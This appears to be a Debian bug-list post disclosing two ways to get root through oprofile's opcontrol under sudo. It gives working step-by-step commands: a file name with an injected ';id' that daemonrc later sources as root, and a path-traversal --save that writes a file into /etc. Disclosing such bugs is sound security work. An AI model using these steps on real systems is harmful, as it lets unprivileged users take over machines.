I just found 2 more ways to execute arbitrary commands via sudo opcontrol
################# Method 1 ##################
The problem is in the functions do_save_setup() where multiple values
are saved in the shell script /root/.oprofile/daemonrc.
That file is sourced in do_load_setup() by later invocations of opcontrol.
The function do_save_setup() does not sanitize the values and thus
allows do_load_setup() to execute arbitrary commands.
There is even a comment in do_load_setup that indicates that the method
is known to be insecure
Here is a possible method using the --vmlinux option:
(1) create a fake vmlinux file with a 'malformed' name
# touch "$HOME/abcd;id"
(2) start the oprofile daemon using that vmlinux file. This creates the
daemonrc file
# sudo opcontrol --vmlinux="$HOME/aaaa;id"
(3) Any invocation of opcontrol will now source the malformed daemonrc
file as root.
# sudo opcontrol --stop
uid=0(root) gid=0(root) groups=0(root)
Daemon not running
(4) The daemonrc file can be cleared with
# sudo opcontrol --no-vmlinux
The same trick can probably be used with the --session-dir and --xen
options.
################# Method 2 ##################
The --save=name option is moving samples/current to samples/name in the
current session directory.
A proper combination of --session-dir and --save can be used to copy a
file to any location.
The following example shows how to create a file /etc/XXX
(1) Create a 'samples' directory
# mkdir -p /tmp/xxx/samples
(2) Create a file named 'current' in that directory
# echo "my_commands" > /tmp/xxx/samples/current
(3) Set the oprofile session directory to the root of the 'samples'
directory
# sudo opcontrol --session-dir=/tmp/xxx
(4) Execute --save with a path relative to the 'current' file
# sudo opcontrol --save=../../../etc/XXX
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org